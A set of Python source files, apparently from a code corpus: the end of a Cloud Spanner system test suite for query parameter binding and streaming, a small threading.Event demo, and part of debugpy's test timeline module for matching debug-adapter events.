valid_input = (("", 0),)
with self._db.batch() as batch:
batch.delete(table, self.ALL)
batch.insert(table, columns, valid_input)
invalid_input = ((0, ""),)
with self.assertRaises(exceptions.FailedPrecondition):
with self._db.batch() as batch:
batch.delete(table, self.ALL)
batch.insert(table, columns, invalid_input)
def test_execute_sql_select_1(self):
self._db.snapshot(multi_use=True)
# Hello, world query
self._check_sql_results(
self._db,
sql="SELECT 1",
params=None,
param_types=None,
expected=[(1,)],
order=False,
)
def _bind_test_helper(
self, type_name, single_value, array_value, expected_array_value=None
):
self._db.snapshot(multi_use=True)
# Bind a non-null <type_name>
self._check_sql_results(
self._db,
sql="SELECT @v",
params={"v": single_value},
param_types={"v": Type(code=type_name)},
expected=[(single_value,)],
order=False,
)
# Bind a null <type_name>
self._check_sql_results(
self._db,
sql="SELECT @v",
params={"v": None},
param_types={"v": Type(code=type_name)},
expected=[(None,)],
order=False,
)
# Bind an array of <type_name>
array_type = Type(code=TypeCode.ARRAY, array_element_type=Type(code=type_name))
if expected_array_value is None:
expected_array_value = array_value
self._check_sql_results(
self._db,
sql="SELECT @v",
params={"v": array_value},
param_types={"v": array_type},
expected=[(expected_array_value,)],
order=False,
)
# Bind an empty array of <type_name>
self._check_sql_results(
self._db,
sql="SELECT @v",
params={"v": []},
param_types={"v": array_type},
expected=[([],)],
order=False,
)
# Bind a null array of <type_name>
self._check_sql_results(
self._db,
sql="SELECT @v",
params={"v": None},
param_types={"v": array_type},
expected=[(None,)],
order=False,
)
def test_execute_sql_w_string_bindings(self):
self._bind_test_helper(TypeCode.STRING, "Phred", ["Phred", "Bharney"])
def test_execute_sql_w_bool_bindings(self):
self._bind_test_helper(TypeCode.BOOL, True, [True, False, True])
def test_execute_sql_w_int64_bindings(self):
self._bind_test_helper(TypeCode.INT64, 42, [123, 456, 789])
def test_execute_sql_w_float64_bindings(self):
self._bind_test_helper(TypeCode.FLOAT64, 42.3, [12.3, 456.0, 7.89])
def test_execute_sql_w_float_bindings_transfinite(self):
# Find -inf
self._check_sql_results(
self._db,
sql="SELECT @neg_inf",
params={"neg_inf": NEG_INF},
param_types={"neg_inf": param_types.FLOAT64},
expected=[(NEG_INF,)],
order=False,
)
# Find +inf
self._check_sql_results(
self._db,
sql="SELECT @pos_inf",
params={"pos_inf": POS_INF},
param_types={"pos_inf": param_types.FLOAT64},
expected=[(POS_INF,)],
order=False,
)
def test_execute_sql_w_bytes_bindings(self):
self._bind_test_helper(TypeCode.BYTES, b"DEADBEEF", [b"FACEDACE", b"DEADBEEF"])
def test_execute_sql_w_timestamp_bindings(self):
import pytz
from google.api_core.datetime_helpers import DatetimeWithNanoseconds
timestamp_1 = DatetimeWithNanoseconds(
1989, 1, 17, 17, 59, 12, nanosecond=345612789
)
timestamp_2 = DatetimeWithNanoseconds(
1989, 1, 17, 17, 59, 13, nanosecond=456127893
)
timestamps = [timestamp_1, timestamp_2]
# In round-trip, timestamps acquire a timezone value.
expected_timestamps = [
timestamp.replace(tzinfo=pytz.UTC) for timestamp in timestamps
]
self._recurse_into_lists = False
self._bind_test_helper(
TypeCode.TIMESTAMP, timestamp_1, timestamps, expected_timestamps
)
def test_execute_sql_w_date_bindings(self):
import datetime
dates = [SOME_DATE, SOME_DATE + datetime.timedelta(days=1)]
self._bind_test_helper(TypeCode.DATE, SOME_DATE, dates)
@unittest.skipIf(USE_EMULATOR, "Skipping NUMERIC")
def test_execute_sql_w_numeric_bindings(self):
self._bind_test_helper(TypeCode.NUMERIC, NUMERIC_1, [NUMERIC_1, NUMERIC_2])
def test_execute_sql_w_query_param_struct(self):
name = "Phred"
count = 123
size = 23.456
height = 188.0
weight = 97.6
record_type = param_types.Struct(
[
param_types.StructField("name", param_types.STRING),
param_types.StructField("count", param_types.INT64),
param_types.StructField("size", param_types.FLOAT64),
param_types.StructField(
"nested",
param_types.Struct(
[
param_types.StructField("height", param_types.FLOAT64),
param_types.StructField("weight", param_types.FLOAT64),
]
),
),
]
)
# Query with null struct, explicit type
self._check_sql_results(
self._db,
sql="SELECT @r.name, @r.count, @r.size, @r.nested.weight",
params={"r": None},
param_types={"r": record_type},
expected=[(None, None, None, None)],
order=False,
)
# Query with non-null struct, explicit type, NULL values
self._check_sql_results(
self._db,
sql="SELECT @r.name, @r.count, @r.size, @r.nested.weight",
params={"r": (None, None, None, None)},
param_types={"r": record_type},
expected=[(None, None, None, None)],
order=False,
)
# Query with non-null struct, explicit type, nested NULL values
self._check_sql_results(
self._db,
sql="SELECT @r.nested.weight",
params={"r": (None, None, None, (None, None))},
param_types={"r": record_type},
expected=[(None,)],
order=False,
)
# Query with non-null struct, explicit type
self._check_sql_results(
self._db,
sql="SELECT @r.name, @r.count, @r.size, @r.nested.weight",
params={"r": (name, count, size, (height, weight))},
param_types={"r": record_type},
expected=[(name, count, size, weight)],
order=False,
)
# Query with empty struct, explicitly empty type
empty_type = param_types.Struct([])
self._check_sql_results(
self._db,
sql="SELECT @r IS NULL",
params={"r": ()},
param_types={"r": empty_type},
expected=[(False,)],
order=False,
)
# Query with null struct, explicitly empty type
self._check_sql_results(
self._db,
sql="SELECT @r IS NULL",
params={"r": None},
param_types={"r": empty_type},
expected=[(True,)],
order=False,
)
# Query with equality check for struct value
struct_equality_query = (
"SELECT " '@struct_param=STRUCT<threadf INT64, userf STRING>(1,"bob")'
)
struct_type = param_types.Struct(
[
param_types.StructField("threadf", param_types.INT64),
param_types.StructField("userf", param_types.STRING),
]
)
self._check_sql_results(
self._db,
sql=struct_equality_query,
params={"struct_param": (1, "bob")},
param_types={"struct_param": struct_type},
expected=[(True,)],
order=False,
)
# Query with nullness test for struct
self._check_sql_results(
self._db,
sql="SELECT @struct_param IS NULL",
params={"struct_param": None},
param_types={"struct_param": struct_type},
expected=[(True,)],
order=False,
)
# Query with null array-of-struct
array_elem_type = param_types.Struct(
[param_types.StructField("threadid", param_types.INT64)]
)
array_type = param_types.Array(array_elem_type)
self._check_sql_results(
self._db,
sql="SELECT a.threadid FROM UNNEST(@struct_arr_param) a",
params={"struct_arr_param": None},
param_types={"struct_arr_param": array_type},
expected=[],
order=False,
)
# Query with non-null array-of-struct
self._check_sql_results(
self._db,
sql="SELECT a.threadid FROM UNNEST(@struct_arr_param) a",
params={"struct_arr_param": [(123,), (456,)]},
param_types={"struct_arr_param": array_type},
expected=[(123,), (456,)],
order=False,
)
# Query with null array-of-struct field
struct_type_with_array_field = param_types.Struct(
[
param_types.StructField("intf", param_types.INT64),
param_types.StructField("arraysf", array_type),
]
)
self._check_sql_results(
self._db,
sql="SELECT a.threadid FROM UNNEST(@struct_param.arraysf) a",
params={"struct_param": (123, None)},
param_types={"struct_param": struct_type_with_array_field},
expected=[],
order=False,
)
# Query with non-null array-of-struct field
self._check_sql_results(
self._db,
sql="SELECT a.threadid FROM UNNEST(@struct_param.arraysf) a",
params={"struct_param": (123, ((456,), (789,)))},
param_types={"struct_param": struct_type_with_array_field},
expected=[(456,), (789,)],
order=False,
)
# Query with anonymous / repeated-name fields
anon_repeated_array_elem_type = param_types.Struct(
[
param_types.StructField("", param_types.INT64),
param_types.StructField("", param_types.STRING),
]
)
anon_repeated_array_type = param_types.Array(anon_repeated_array_elem_type)
self._check_sql_results(
self._db,
sql="SELECT CAST(t as STRUCT<threadid INT64, userid STRING>).* "
"FROM UNNEST(@struct_param) t",
params={"struct_param": [(123, "abcdef")]},
param_types={"struct_param": anon_repeated_array_type},
expected=[(123, "abcdef")],
order=False,
)
# Query and return a struct parameter
value_type = param_types.Struct(
[
param_types.StructField("message", param_types.STRING),
param_types.StructField("repeat", param_types.INT64),
]
)
value_query = (
"SELECT ARRAY(SELECT AS STRUCT message, repeat "
"FROM (SELECT @value.message AS message, "
"@value.repeat AS repeat)) AS value"
)
self._check_sql_results(
self._db,
sql=value_query,
params={"value": ("hello", 1)},
param_types={"value": value_type},
expected=[([["hello", 1]],)],
order=False,
)
def test_execute_sql_returning_transfinite_floats(self):
with self._db.snapshot(multi_use=True) as snapshot:
# Query returning -inf, +inf, NaN as column values
rows = list(
snapshot.execute_sql(
"SELECT "
'CAST("-inf" AS FLOAT64), '
'CAST("+inf" AS FLOAT64), '
'CAST("NaN" AS FLOAT64)'
)
)
self.assertEqual(len(rows), 1)
self.assertEqual(rows[0][0], float("-inf"))
self.assertEqual(rows[0][1], float("+inf"))
# NaNs cannot be compared by equality.
self.assertTrue(math.isnan(rows[0][2]))
# Query returning array of -inf, +inf, NaN as one column
rows = list(
snapshot.execute_sql(
"SELECT"
' [CAST("-inf" AS FLOAT64),'
' CAST("+inf" AS FLOAT64),'
' CAST("NaN" AS FLOAT64)]'
)
)
self.assertEqual(len(rows), 1)
float_array = rows[0][0]
self.assertEqual(float_array[0], float("-inf"))
self.assertEqual(float_array[1], float("+inf"))
# NaNs cannot be searched for by equality.
self.assertTrue(math.isnan(float_array[2]))
def test_partition_query(self):
row_count = 40
sql = "SELECT * FROM {}".format(self.TABLE)
committed = self._set_up_table(row_count)
# Paritioned query does not support ORDER BY
all_data_rows = set(self._row_data(row_count))
union = set()
batch_txn = self._db.batch_snapshot(read_timestamp=committed)
for batch in batch_txn.generate_query_batches(sql):
p_results_iter = batch_txn.process(batch)
# Lists aren't hashable so the results need to be converted
rows = [tuple(result) for result in p_results_iter]
union.update(set(rows))
self.assertEqual(union, all_data_rows)
batch_txn.close()
class TestStreamingChunking(unittest.TestCase, _TestData):
@classmethod
def setUpClass(cls):
from tests.system.utils.streaming_utils import INSTANCE_NAME
from tests.system.utils.streaming_utils import DATABASE_NAME
instance = Config.CLIENT.instance(INSTANCE_NAME)
if not instance.exists():
raise unittest.SkipTest(
"Run 'tests/system/utils/populate_streaming.py' to enable."
)
database = instance.database(DATABASE_NAME)
if not instance.exists():
raise unittest.SkipTest(
"Run 'tests/system/utils/populate_streaming.py' to enable."
)
cls._db = database
def _verify_one_column(self, table_desc):
sql = "SELECT chunk_me FROM {}".format(table_desc.table)
with self._db.snapshot() as snapshot:
rows = list(snapshot.execute_sql(sql))
self.assertEqual(len(rows), table_desc.row_count)
expected = table_desc.value()
for row in rows:
self.assertEqual(row[0], expected)
def _verify_two_columns(self, table_desc):
sql = "SELECT chunk_me, chunk_me_2 FROM {}".format(table_desc.table)
with self._db.snapshot() as snapshot:
rows = list(snapshot.execute_sql(sql))
self.assertEqual(len(rows), table_desc.row_count)
expected = table_desc.value()
for row in rows:
self.assertEqual(row[0], expected)
self.assertEqual(row[1], expected)
def test_four_kay(self):
from tests.system.utils.streaming_utils import FOUR_KAY
self._verify_one_column(FOUR_KAY)
def test_forty_kay(self):
from tests.system.utils.streaming_utils import FORTY_KAY
self._verify_one_column(FORTY_KAY)
def test_four_hundred_kay(self):
from tests.system.utils.streaming_utils import FOUR_HUNDRED_KAY
self._verify_one_column(FOUR_HUNDRED_KAY)
def test_four_meg(self):
from tests.system.utils.streaming_utils import FOUR_MEG
self._verify_two_columns(FOUR_MEG)
class CustomException(Exception):
"""Placeholder for any user-defined exception."""
class _DatabaseDropper(object):
"""Helper for cleaning up databases created on-the-fly."""
def __init__(self, db):
self._db = db
def delete(self):
self._db.drop()
class _ReadAbortTrigger(object):
"""Helper for tests provoking abort-during-read."""
KEY1 = "key1"
KEY2 = "key2"
def __init__(self):
self.provoker_started = threading.Event()
self.provoker_done = threading.Event()
self.handler_running = threading.Event()
self.handler_done = threading.Event()
def _provoke_abort_unit_of_work(self, transaction):
keyset = KeySet(keys=[(self.KEY1,)])
rows = list(transaction.read(COUNTERS_TABLE, COUNTERS_COLUMNS, keyset))
assert len(rows) == 1
row = rows[0]
value = row[1]
self.provoker_started.set()
self.handler_running.wait()
transaction.update(COUNTERS_TABLE, COUNTERS_COLUMNS, [[self.KEY1, value + 1]])
def provoke_abort(self, database):
database.run_in_transaction(self._provoke_abort_unit_of_work)
self.provoker_done.set()
def _handle_abort_unit_of_work(self, transaction):
keyset_1 = KeySet(keys=[(self.KEY1,)])
rows_1 = list(transaction.read(COUNTERS_TABLE, COUNTERS_COLUMNS, keyset_1))
assert len(rows_1) == 1
row_1 = rows_1[0]
value_1 = row_1[1]
self.handler_running.set()
self.provoker_done.wait()
keyset_2 = KeySet(keys=[(self.KEY2,)])
rows_2 = list(transaction.read(COUNTERS_TABLE, COUNTERS_COLUMNS, keyset_2))
assert len(rows_2) == 1
row_2 = rows_2[0]
value_2 = row_2[1]
transaction.update(
COUNTERS_TABLE, COUNTERS_COLUMNS, [[self.KEY2, value_1 + value_2]]
)
def handle_abort(self, database):
database.run_in_transaction(self._handle_abort_unit_of_work)
self.handler_done.set()
class FauxCall(object):
def __init__(self, code, details="FauxCall"):
self._code = code
self._details = details
def initial_metadata(self):
return {}
def trailing_metadata(self):
return {}
def code(self):
return self._code
def details(self):
return self._details
|
inter_thread_communication.py
|
# import time module
import time
# import threading module
import threading
class product:
def buyer(self):
print('John consumer is wait for product')
print('...............')
event_object.wait()
print('got product')
def seller(self):
time.sleep(5)
print('Tom producer producing items')
print('tom goes to retailer')
event_object.wait()
def retailer(self):
time.sleep(10)
print('retailer found that product and directly send to buyer')
event_object.set()
# class object
class_obj = product()
# setting event object
if __name__ == '__main__':
event_object = threading.Event()
# creating threads
T1 = threading.Thread(target=class_obj.buyer)
T2 = threading.Thread(target=class_obj.seller)
T3 = threading.Thread(target=class_obj.retailer)
# starting threads
T1.start()
T2.start()
T3.start()
|
timeline.py
|
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See LICENSE in the project root
# for license information.
from __future__ import absolute_import, division, print_function, unicode_literals
import collections
import contextlib
import itertools
import threading
from debugpy.common import compat, fmt, log, messaging, timestamp
from debugpy.common.compat import queue
from tests.patterns import some
SINGLE_LINE_REPR_LIMIT = 120
"""If repr() of an expectation or an occurrence is longer than this value, it will
be formatted to use multiple shorter lines if possible.
"""
# For use by Expectation.__repr__. Uses fmt() to create unique instances.
_INDENT = fmt("{0}", "_INDENT")
_DEDENT = fmt("{0}", "_DEDENT")
class Timeline(object):
def __init__(self, name=None):
self.name = str(name if name is not None else id(self))
self.ignore_unobserved = []
self._listeners = [] # [(expectation, callable)]
self._index_iter = itertools.count(1)
self._accepting_new = threading.Event()
self._finalized = threading.Event()
self._recorded_new = threading.Condition()
self._record_queue = queue.Queue()
self._recorder_thread = threading.Thread(
target=self._recorder_worker, name=fmt("{0} recorder", self)
)
self._recorder_thread.daemon = True
self._recorder_thread.start()
# Set up initial environment for our first mark()
self._last = None
self._beginning = None
self._accepting_new.set()
self._beginning = self.mark("START")
assert self._last is self._beginning
self._proceeding_from = self._beginning
def expect_frozen(self):
if not self.is_frozen:
raise Exception("Timeline can only be inspected while frozen.")
def __iter__(self):
self.expect_frozen()
return self._beginning.and_following()
def __len__(self):
return len(self.history())
@property
def beginning(self):
return self._beginning
@property
def last(self):
self.expect_frozen()
return self._last
def history(self):
self.expect_frozen()
return list(iter(self))
def __contains__(self, expectation):
self.expect_frozen()
return any(expectation.test(self.beginning, self.last))
def all_occurrences_of(self, expectation):
return tuple(occ for occ in self if occ == expectation)
def __getitem__(self, index):
assert isinstance(index, slice)
assert index.step is None
return Interval(self, index.start, index.stop)
def __reversed__(self):
self.expect_frozen()
return self.last.and_preceding()
@property
def is_frozen(self):
return not self._accepting_new.is_set()
def freeze(self):
self._accepting_new.clear()
def unfreeze(self):
if not self.is_final:
self._accepting_new.set()
@contextlib.contextmanager
def frozen(self):
was_frozen = self.is_frozen
self.freeze()
yield
if not was_frozen and not self.is_final:
self.unfreeze()
@contextlib.contextmanager
def unfrozen(self):
was_frozen = self.is_frozen
self.unfreeze()
yield
if was_frozen or self.is_final:
self.freeze()
@property
def is_final(self):
return self._finalized.is_set()
def finalize(self):
if self.is_final:
return
log.info("Finalizing timeline...")
with self.unfrozen():
self.mark("FINISH")
with self.unfrozen():
self._finalized.set()
# Drain the record queue.
self._record_queue.join()
# Tell the recorder to shut itself down.
self._record_queue.put(None)
self._recorder_thread.join()
assert self._record_queue.empty(), "Finalized timeline had pending records"
def close(self):
self.finalize()
self[:].expect_no_unobserved()
def __enter__(self):
return self
def __leave__(self, *args):
self.close()
def observe(self, *occurrences):
for occ in occurrences:
occ.observed = True
def observe_all(self, expectation=None):
self.expect_frozen()
occs = (
list(self)
if expectation is None
else [occ for occ in self if occ == expectation]
)
self.observe(*occs)
def wait_until(self, condition, freeze=None):
freeze = freeze or self.is_frozen
try:
with self._recorded_new:
# First, test the condition against the timeline as it currently is.
with self.frozen():
result = condition()
if result:
return result
# Now keep spinning waiting for new occurrences to come, and test the
# condition against every new batch in turn.
self.unfreeze()
while True:
self._recorded_new.wait()
with self.frozen():
result = condition()
if result:
return result
assert not self.is_final
finally:
if freeze:
self.freeze()
def _wait_until_realized(
self, expectation, freeze=None, explain=True, observe=True
):
def has_been_realized():
for reasons in expectation.test(self.beginning, self.last):
if observe:
self.expect_realized(expectation, explain=explain, observe=observe)
return reasons
reasons = self.wait_until(has_been_realized, freeze)
return latest_of(reasons.values())
def wait_until_realized(self, expectation, freeze=None, explain=True, observe=True):
if explain:
log.info("Waiting for {0!r}", expectation)
return self._wait_until_realized(expectation, freeze, explain, observe)
def wait_for(self, expectation, freeze=None, explain=True):
assert expectation.has_lower_bound, (
"Expectation must have a lower time bound to be used with wait_for()! "
"Use >> to sequence an expectation against an occurrence to establish a lower bound, "
"or wait_for_next() to wait for the next expectation since the timeline was last "
"frozen, or wait_until_realized() when a lower bound is really not necessary."
)
if explain:
log.info("Waiting for {0!r}", expectation)
return self._wait_until_realized(expectation, freeze, explain=explain)
def wait_for_next(self, expectation, freeze=True, explain=True, observe=True):
if explain:
log.info("Waiting for next {0!r}", expectation)
return self._wait_until_realized(
self._proceeding_from >> expectation, freeze, explain, observe
)
def new(self):
self.expect_frozen()
first_new = self._proceeding_from.next
if first_new is not None:
return self[first_new:]
else:
return self[self.last : self.last]
def proceed(self):
self.expect_frozen()
self.new().expect_no_unobserved()
self._proceeding_from = self.last
self.unfreeze()
def _expect_realized(self, expectation, first, explain=True, observe=True):
self.expect_frozen()
try:
reasons = next(expectation.test(first, self.last))
except StopIteration:
log.info("No matching {0!r}", expectation)
occurrences = list(first.and_following())
log.info("Occurrences considered: {0!r}", occurrences)
raise AssertionError("Expectation not matched")
occs = tuple(reasons.values())
assert occs
if observe:
self.observe(*occs)
if explain:
self._explain_how_realized(expectation, reasons)
return occs if len(occs) > 1 else occs[0]
def expect_realized(self, expectation, explain=True, observe=True):
return self._expect_realized(expectation, self.beginning, explain, observe)
def expect_new(self, expectation, explain=True, observe=True):
assert (
self._proceeding_from.next is not None
), "No new occurrences since last proceed()"
return self._expect_realized(
expectation, self._proceeding_from.next, explain, observe
)
def expect_not_realized(self, expectation):
self.expect_frozen()
assert expectation not in self
def expect_no_new(self, expectation):
self.expect_frozen()
assert expectation not in self.new()
def _explain_how_realized(self, expectation, reasons):
message = fmt("Realized {0!r}", expectation)
# For the breakdown, we want to skip any expectations that were exact occurrences,
# since there's no point explaining that occurrence was realized by itself.
skip = [exp for exp in reasons.keys() if isinstance(exp, Occurrence)]
for exp in skip:
reasons.pop(exp, None)
if reasons == {expectation: some.object}:
# If there's only one expectation left to explain, and it's the top-level
# one, then we have already printed it, so just add the explanation.
reason = reasons[expectation]
if "\n" in message:
message += fmt(" == {0!r}", reason)
else:
message += fmt("\n == {0!r}", reason)
elif reasons:
# Otherwise, break it down expectation by expectation.
message += ":"
for exp, reason in reasons.items():
message += fmt("\n\n where {0!r}\n == {1!r}", exp, reason)
else:
message += "."
log.info("{0}", message)
def _record(self, occurrence, block=True):
assert isinstance(occurrence, Occurrence)
assert occurrence.timeline is None
assert occurrence.timestamp is None
assert (
not self.is_final
), "Trying to record a new occurrence in a finalized timeline"
self._record_queue.put(occurrence, block=block)
if block:
self._record_queue.join()
return occurrence
def _recorder_worker(self):
while True:
occ = self._record_queue.get()
if occ is None:
self._record_queue.task_done()
break
self._accepting_new.wait()
with self._recorded_new:
occ.timeline = self
occ.timestamp = timestamp.current()
occ.index = next(self._index_iter)
if self._last is None:
self._beginning = occ
self._last = occ
else:
assert self._last.timestamp <= occ.timestamp
occ.previous = self._last
self._last._next = occ
self._last = occ
self._recorded_new.notify_all()
self._record_queue.task_done()
for exp, callback in tuple(self._listeners):
if exp == occ:
callback(occ)
def mark(self, id, block=True):
occ = Occurrence("mark", id)
occ.id = id
occ.observed = True
return self._record(occ, block)
def record_event(self, message, block=True):
occ = EventOccurrence(message)
return self._record(occ, block)
def record_request(self, message, block=True):
occ = RequestOccurrence(message)
occ.observed = True
return self._record(occ, block)
def record_response(self, request_occ, message, block=True):
occ = ResponseOccurrence(request_occ, message)
return self._record(occ, block)
def when(self, expectation, callback):
"""For every occurrence recorded after this call, invokes callback(occurrence)
if occurrence == expectation.
"""
self._listeners.append((expectation, callback))
def _snapshot(self):
last = self._last
occ = self._beginning
while True:
yield occ
if occ is last:
break
occ = occ._next
def __repr__(self):
return "|" + " >> ".join(repr(occ) for occ in self._snapshot()) + "|"
def __str__(self):
return "Timeline-" + self.name
class Interval(tuple):
def __new__(cls, timeline, start, stop):
assert start is None or isinstance(start, Expectation)
assert stop is None or isinstance(stop, Expectation)
if not isinstance(stop, Occurrence):
timeline.expect_frozen()
occs = ()
if start is None:
start = timeline._beginning
for occ in start.and_following(up_to=stop):
if occ == stop:
break
if occ == start:
occs = occ.and_following(up_to=stop)
break
result = super(Interval, cls).__new__(cls, occs)
result.timeline = timeline
result.start = start
result.stop = stop
return result
def __contains__(self, expectation):
return any(expectation.test(self[0], self[-1])) if len(self) > 0 else False
def all_occurrences_of(self, expectation):
return tuple(occ for occ in self if occ == expectation)
def expect_no_unobserved(self):
if not self:
return
unobserved = [
occ
for occ in self
if not occ.observed
and all(exp != occ for exp in self.timeline.ignore_unobserved)
]
if not unobserved:
return
raise log.error(
"Unobserved occurrences detected:\n\n{0}\n\nignoring unobserved:\n\n{1}",
"\n\n".join(repr(occ) for occ in unobserved),
"\n\n".join(repr(exp) for exp in self.timeline.ignore_unobserved),
)
class Expectation(object):
timeline = None
has_lower_bound = False
def test(self, first, last):
raise NotImplementedError()
def wait(self, freeze=None, explain=True):
assert (
self.timeline is not None
), "Expectation must be bound to a timeline to be waited on."
return self.timeline.wait_for(self, freeze, explain)
def wait_until_realized(self, freeze=None):
return self.timeline.wait_until_realized(self, freeze)
def __eq__(self, other):
if self is other:
return True
elif isinstance(other, Occurrence) and any(self.test(other, other)):
return True
else:
return NotImplemented
def __ne__(self, other):
return not self == other
def after(self, other):
return SequencedExpectation(other, self)
def when(self, condition):
return ConditionalExpectation(self, condition)
def __rshift__(self, other):
return self if other is None else other.after(self)
def __and__(self, other):
assert isinstance(other, Expectation)
return AndExpectation(self, other)
def __or__(self, other):
assert isinstance(other, Expectation)
return OrExpectation(self, other)
def __xor__(self, other):
assert isinstance(other, Expectation)
return XorExpectation(self, other)
def __hash__(self):
return hash(id(self))
def __repr__(self):
raise NotImplementedError
class DerivativeExpectation(Expectation):
def __init__(self, *expectations):
self.expectations = expectations
assert len(expectations) > 0
assert all(isinstance(exp, Expectation) for exp in expectations)
timelines = {id(exp.timeline): exp.timeline for exp in expectations}
timelines.pop(id(None), None)
if len(timelines) > 1:
offending_expectations = ""
for tl_id, tl in timelines.items():
offending_expectations += fmt("\n {0}: {1!r}\n", tl_id, tl)
raise log.error(
"Cannot mix expectations from multiple timelines:\n{0}",
offending_expectations,
)
for tl in timelines.values():
self.timeline = tl
@property
def has_lower_bound(self):
return all(exp.has_lower_bound for exp in self.expectations)
def flatten(self):
"""Flattens nested expectation chains.
If self is of type E, and given an expectation like::
E(E(e1, E(e2, e3)), E(E(e4, e5), E(e6)))
flatten() produces an iterator over::
e1, e2, e3, e4, e5, e6
"""
for exp in self.expectations:
if type(exp) is type(self):
for exp in exp.flatten():
yield exp
else:
yield exp
def describe(self, newline):
"""Returns an iterator describing this expectation. This method is used
to implement repr().
For every yielded _INDENT and _DEDENT, a newline and the appropriate amount
of spaces for correct indentation at the current level is added to the repr.
For every yielded Expectation, describe() is invoked recursively.
For every other yielded value, str(value) added to the repr.
newline is set to either "" or "\n", depending on whether the repr must be
single-line or multiline. Implementations of describe() should use it in
lieu of raw "\n" insofar as possible; however, repr() will automatically
fall back to multiline mode if "\n" occurs in single-line mode.
The default implementation produces a description that looks like::
(e1 OP e2 OP e3 OP ...)
where OP is the value of self.OPERATOR.
"""
op = self.OPERATOR
yield "("
yield _INDENT
first = True
for exp in self.flatten():
if first:
first = False
else:
yield " " + op + " "
yield newline
yield exp
yield _DEDENT
yield ")"
def __repr__(self):
def indent():
return indent.level * " " if newline else ""
def recurse(exp):
for item in exp.describe(newline):
if isinstance(item, DerivativeExpectation):
recurse(item)
elif item is _INDENT:
indent.level += 1
result.append(newline + indent())
elif item is _DEDENT:
assert indent.level > 0, "_DEDENT without matching _INDENT"
indent.level -= 1
result.append(newline + indent())
else:
item = str(item).replace("\n", "\n" + indent())
result.append(item)
# Try single-line repr first.
indent.level = 0
newline = ""
result = []
recurse(self)
s = "".join(result)
if len(s) <= SINGLE_LINE_REPR_LIMIT and "\n" not in s:
return s
# If it was too long, or had newlines anyway, fall back to multiline.
assert indent.level == 0
newline = "\n"
result[:] = []
recurse(self)
return "".join(result)
class SequencedExpectation(DerivativeExpectation):
OPERATOR = ">>"
def __init__(self, first, second):
super(SequencedExpectation, self).__init__(first, second)
@property
def first(self):
return self.expectations[0]
@property
def second(self):
return self.expectations[1]
def test(self, first, last):
assert isinstance(first, Occurrence)
assert isinstance(last, Occurrence)
for first_reasons in self.first.test(first, last):
first_occs = first_reasons.values()
lower_bound = latest_of(first_occs).next
if lower_bound is not None:
for second_reasons in self.second.test(lower_bound, last):
reasons = second_reasons.copy()
reasons.update(first_reasons)
yield reasons
@property
def has_lower_bound(self):
return self.first.has_lower_bound or self.second.has_lower_bound
class OrExpectation(DerivativeExpectation):
OPERATOR = "|"
def test(self, first, last):
assert isinstance(first, Occurrence)
assert isinstance(last, Occurrence)
for exp in self.expectations:
for reasons in exp.test(first, last):
yield reasons
def __or__(self, other):
assert isinstance(other, Expectation)
return OrExpectation(*(self.expectations + (other,)))
class AndExpectation(DerivativeExpectation):
OPERATOR = "&"
def test(self, first, last):
assert isinstance(first, Occurrence)
assert isinstance(last, Occurrence)
if len(self.expectations) <= 1:
for exp in self.expectations:
for reasons in exp.test(first, last):
yield reasons
return
lhs = self.expectations[0]
rhs = AndExpectation(*self.expectations[1:])
for lhs_reasons in lhs.test(first, last):
for rhs_reasons in rhs.test(first, last):
reasons = lhs_reasons.copy()
reasons.update(rhs_reasons)
yield reasons
@property
def has_lower_bound(self):
return any(exp.has_lower_bound for exp in self.expectations)
def __and__(self, other):
assert isinstance(other, Expectation)
return AndExpectation(*(self.expectations + (other,)))
def __repr__(self):
return "(" + " & ".join(repr(exp) for exp in self.expectations) + ")"
class XorExpectation(DerivativeExpectation):
OPERATOR = "^"
def test(self, first, last):
assert isinstance(first, Occurrence)
assert isinstance(last, Occurrence)
reasons = None
for exp in self.expectations:
for exp_reasons in exp.test(first, last):
if reasons is None:
reasons = exp_reasons
else:
return
if reasons is not None:
yield reasons
@property
def has_lower_bound(self):
return all(exp.has_lower_bound for exp in self.expectations)
def __xor__(self, other):
assert isinstance(other, Expectation)
return XorExpectation(*(self.expectations + (other,)))
class ConditionalExpectation(DerivativeExpectation):
def __init__(self, expectation, condition):
self.condition = condition
super(ConditionalExpectation, self).__init__(expectation)
@property
def expectation(self):
return self.expectations[0]
def test(self, first, last):
assert isinstance(first, Occurrence)
assert isinstance(last, Occurrence)
for reasons in self.expectation.test(first, last):
occs = reasons.values()
if self.condition(*occs):
yield reasons
def describe(self, newline):
yield "?"
yield self.expectation
class PatternExpectation(Expectation):
def __init__(self, *circumstances):
self.circumstances = circumstances
def test(self, first, last):
assert isinstance(first, Occurrence)
assert isinstance(last, Occurrence)
for occ in first.and_following(up_to=last, inclusive=True):
if occ.circumstances == self.circumstances:
yield {self: occ}
def describe(self):
rest = repr(self.circumstances[1:])
if rest.endswith(",)"):
rest = rest[:-2] + ")"
return fmt("<{0}{1}>", self.circumstances[0], rest)
def __repr__(self):
return self.describe()
def Mark(id):
return PatternExpectation("mark", id)
def _describe_message(message_type, *items):
items = (("type", message_type),) + items
d = collections.OrderedDict(items)
# Keep it all on one line if it's short enough, but indent longer ones.
for format_string in "{0!j:indent=None}", "{0!j}":
s = fmt(format_string, d)
s = "{..., " + s[1:]
# Used by some.dict.containing to inject ... as needed.
s = s.replace('"\\u0002...": "...\\u0003"', "...")
# Used by some.* and by Event/Request/Response expectations below.
s = s.replace('"\\u0002', "")
s = s.replace('\\u0003"', "")
if len(s) <= SINGLE_LINE_REPR_LIMIT:
break
return s
def Event(event, body=some.object):
exp = PatternExpectation("event", event, body)
items = (("event", event),)
if body is some.object:
items += (("\002...", "...\003"),)
else:
items += (("body", body),)
exp.describe = lambda: _describe_message("event", *items)
return exp
def Request(command, arguments=some.object):
exp = PatternExpectation("request", command, arguments)
items = (("command", command),)
if arguments is some.object:
items += (("\002...", "...\003"),)
else:
items += (("arguments", arguments),)
exp.describe = lambda: _describe_message("request", *items)
return exp
def Response(request, body=some.object):
assert isinstance(request, Expectation) or isinstance(request, RequestOccurrence)
exp = PatternExpectation("response", request, body)
exp.timeline = request.timeline
exp.has_lower_bound = request.has_lower_bound
# Try to be as specific as possible.
if isinstance(request, Expectation):
if request.circumstances[0] != "request":
exp.describe = lambda: fmt("response to {0!r}", request)
return
else:
items = (("command", request.circumstances[1]),)
else:
items = (("command", request.command),)
if isinstance(request, Occurrence):
items += (("request_seq", request.seq),)
if body is some.object:
items += (("\002...", "...\003"),)
elif body is some.error or body == some.error:
items += (("success", False),)
